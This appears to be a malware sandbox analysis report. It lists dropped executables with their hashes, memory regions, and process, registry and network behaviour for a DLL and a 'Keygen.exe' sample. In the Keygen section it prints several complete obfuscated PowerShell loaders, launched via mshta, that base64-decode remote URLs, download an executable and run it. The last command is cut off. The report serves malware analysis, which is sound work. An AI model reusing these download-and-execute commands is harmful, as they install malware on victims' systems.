C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe

MD5 9133c2a5ebf3e25aceae5a001ca6f279
SHA1 319f911282f3cded94de3730fa0abd5dec8f14be
SHA256 7c3615c405f7a11f1c217b9ecd1000cf60a37bca7da1f2d12da21cc110b16b4d
SHA512 1d1af3fcfcdba41874e3eb3e2571d25798acfd49b63b7fcf9393be2f59c9ba77e563da1717abcd6445fc52fd6d948bf4c0dd5978a192c8e32e0a9279fd0be33e

memory/4616-35-0x0000000075090000-0x0000000075641000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe

MD5 e87459f61fd1f017d4bd6b0a1a1fc86a
SHA1 30838d010aad8c9f3fd0fc302e71b4cbe6f138c0
SHA256 ec1b56551036963a425f6a0564d75980054e01d251c88eb29c81c1b2182f5727
SHA512 dd13993174d234d60ec98124b71bfefcf556c069e482a2e1f127f81f6738b71cd37cee95bf0119d3a61513c01438055767d480e26d6ed260ee16a96533d0cfa2

memory/4616-56-0x0000000075090000-0x0000000075641000-memory.dmp

memory/4648-78-0x0000000075090000-0x0000000075641000-memory.dmp

memory/444-81-0x0000000075090000-0x0000000075641000-memory.dmp

memory/2604-82-0x0000000004B20000-0x0000000004BB2000-memory.dmp

memory/2604-80-0x00000000050D0000-0x0000000005674000-memory.dmp

memory/2604-79-0x0000000000230000-0x0000000000294000-memory.dmp

memory/3252-77-0x0000000075090000-0x0000000075641000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe

MD5 9d2a888ca79e1ff3820882ea1d88d574
SHA1 112c38d80bf2c0d48256249bbabe906b834b1f66
SHA256 8b5b38085f12d51393ed5a481a554074d3c482d53ecd917f2f5dffdf3d2ee138
SHA512 17a9f74ecf9f118ed0252fa0bc6ce0f9758a4dc75f238cae304def9c37cd94623818dd4aef38826642ff9e549b7e6047318f8bf6de7edff2d61a298d0bf5c840

memory/2604-83-0x0000000004BC0000-0x0000000004BCA000-memory.dmp

memory/3132-75-0x0000000000400000-0x00000000004BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe

MD5 f07d2c33e4afe36ec6f6f14f9a56e84a
SHA1 3ebed0c1a265d1e17ce038dfaf1029387f0b53ee
SHA256 309385e6cd68c0dd148905c3147f77383edaf35da9609c0717da7df1a894e3ca
SHA512 b4fbf0e6b8e7e8e1679680039e4ac0aebdf7967a9cc36d9ddac35fa31d997253384a51656d886afb2ded9f911b7b8b44c2dcb8ebe71962e551c5025a4d75ebe2

C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe

MD5 590acb5fa6b5c3001ebce3d67242aac4
SHA1 5df39906dc4e60f01b95783fc55af6128402d611
SHA256 7bf9b7b25cf1671e5640f8eeac149f9a4e8c9f6c63415f4bd61bccb10ddf8509
SHA512 4ac518140ee666491132525853f2843357d622fe351e59cca7ce3b054d665f77ad8987adddd601e6b1afe6903222d77cf3c41a5aa69e8caf0dcdc7656a43e9ba

C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe

MD5 3e804917c454ca31c1cbd602682542b7
SHA1 1df3e81b9d879e21af299f5478051b98f3cb7739
SHA256 f9f7b6f7b8c5068f9e29a5b50afca609018c50ffd61929e1b78124f5381868f1
SHA512 28e59bc545179c2503771b93d947930bd56f8ebd0402ecbb398335c5ac89f40051e93fbfd84d35b8c625b253bb4cafea6a5360914b8d54d1bc121977f1eadbaf

memory/2604-85-0x0000000008D10000-0x0000000008D34000-memory.dmp

memory/4648-86-0x0000000075090000-0x0000000075641000-memory.dmp

memory/1504-96-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/3508-103-0x0000000000400000-0x000000000040F000-memory.dmp

memory/3508-100-0x0000000000400000-0x000000000040F000-memory.dmp

memory/1504-104-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1504-108-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1504-106-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1504-105-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1504-109-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1504-94-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1504-91-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/2220-117-0x0000000000400000-0x0000000000554000-memory.dmp

memory/2220-115-0x0000000000400000-0x0000000000554000-memory.dmp

memory/2604-121-0x00000000024C0000-0x00000000024D2000-memory.dmp

memory/4616-122-0x0000000075090000-0x0000000075641000-memory.dmp

memory/2604-123-0x00000000024D0000-0x00000000024E2000-memory.dmp

memory/1644-130-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1504-131-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/3252-133-0x0000000075090000-0x0000000075641000-memory.dmp

memory/4616-146-0x0000000075090000-0x0000000075641000-memory.dmp

memory/444-147-0x0000000075090000-0x0000000075641000-memory.dmp

memory/4864-150-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/4864-155-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/4864-153-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/3784-159-0x0000000000680000-0x0000000000681000-memory.dmp

memory/444-212-0x0000000075090000-0x0000000075641000-memory.dmp

memory/1504-214-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/2604-216-0x0000000008FA0000-0x0000000009006000-memory.dmp

memory/2604-218-0x0000000009400000-0x000000000949C000-memory.dmp

memory/5028-223-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/5028-227-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/5028-228-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/3632-226-0x0000000000B40000-0x0000000000B41000-memory.dmp

memory/5028-225-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/1380-233-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/1380-232-0x0000000000400000-0x00000000004BA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\excelsl.exe.log

MD5 0a9b4592cd49c3c21f6767c2dabda92f
SHA1 f534297527ae5ccc0ecb2221ddeb8e58daeb8b74
SHA256 c7effe9cb81a70d738dee863991afefab040290d4c4b78b4202383bcb9f88fcd
SHA512 6b878df474e5bbfb8e9e265f15a76560c2ef151dcebc6388c82d7f6f86ffaf83f5ade5a09f1842e493cb6c8fd63b0b88d088c728fd725f7139f965a5ee332307

C:\Users\Admin\AppData\Local\Temp\tmp2083.tmp.bat

MD5 cfe60abfaac144fb936e6eb8f0a6cd51
SHA1 9058dfef82c941dc1cb1cf5d884e33a9b838436d
SHA256 cc709d56000aa6641bb0a1117ed34410f6df5c5babafd15b4babba555c3b9757
SHA512 14a7107c9bd2e3becfc62cf544dbcfcfaf04309c661fbdbd8ab0d99ccadb6a781ce759d1c551d5481acf2514cb6500ae7ceec921ce0681ccc20e8a769fa85020

C:\Users\Admin\AppData\Roaming\prndrvest.exe

MD5 0ce6d16105796847ef6d07b1f53e2c06
SHA1 6db0501a2f4e1a63531a2ac7a2c195434214f834
SHA256 6018a68a1addfed3acdb90de571524ee2a03b233e11ed1c2070034c26efbf309
SHA512 7561ec5af2cc592818d1d7eb5469397c44011c7ed90142df8024b5d773adc71a718857e996867487a44e47b8e117c4bf07cf15fd977353a3d8de1957d30922f8

Analysis: behavioral15

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

96s

Max time network

116s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\95560f1a465e8ba87a73f8e60a6657545073d55c3b5cfc2ffdaf3d69d46afcf9.dll

Signatures

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4168 set thread context of 2728 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\msiexec.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\95560f1a465e8ba87a73f8e60a6657545073d55c3b5cfc2ffdaf3d69d46afcf9.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\95560f1a465e8ba87a73f8e60a6657545073d55c3b5cfc2ffdaf3d69d46afcf9.dll

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2728 -ip 2728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 576

Network

Country Destination Domain Proto
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

memory/2728-0-0x00000000008C0000-0x00000000008EE000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:12

Platform

win10v2004-20250502-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

141s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-237734941-4188669080-153779821-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-237734941-4188669080-153779821-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-237734941-4188669080-153779821-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Keygen.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-237734941-4188669080-153779821-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-237734941-4188669080-153779821-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-237734941-4188669080-153779821-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-237734941-4188669080-153779821-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-237734941-4188669080-153779821-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\685F.tmp\Keygen.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\685F.tmp\Keygen.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Keygen.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-237734941-4188669080-153779821-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\685F.tmp\Keygen.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3128 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\Keygen.exe C:\Windows\SysWOW64\cmd.exe
PID 3128 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\Keygen.exe C:\Windows\SysWOW64\cmd.exe
PID 3128 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\Keygen.exe C:\Windows\SysWOW64\cmd.exe
PID 4508 wrote to memory of 4560 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\685F.tmp\Keygen.exe
PID 4508 wrote to memory of 4560 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\685F.tmp\Keygen.exe
PID 4508 wrote to memory of 4560 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\685F.tmp\Keygen.exe
PID 4508 wrote to memory of 3784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 3784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 3784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 4324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 4324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 4324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 5460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4508 wrote to memory of 5460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4508 wrote to memory of 5460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4324 wrote to memory of 4812 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 4812 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 4812 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3784 wrote to memory of 5648 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3784 wrote to memory of 5648 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3784 wrote to memory of 5648 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4508 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 5532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 5532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 5532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 2192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4508 wrote to memory of 2192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4508 wrote to memory of 2192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 944 wrote to memory of 5720 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 5720 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 5720 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5532 wrote to memory of 5976 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5532 wrote to memory of 5976 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5532 wrote to memory of 5976 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4508 wrote to memory of 3424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 3424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 3424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4508 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 3424 wrote to memory of 6112 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3424 wrote to memory of 6112 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3424 wrote to memory of 6112 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4872 wrote to memory of 4764 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4872 wrote to memory of 4764 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4872 wrote to memory of 4764 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Keygen.exe

"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\685F.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"

C:\Users\Admin\AppData\Local\Temp\685F.tmp\Keygen.exe

Keygen.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\685F.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\685F.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\timeout.exe

timeout 1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\685F.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\685F.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr 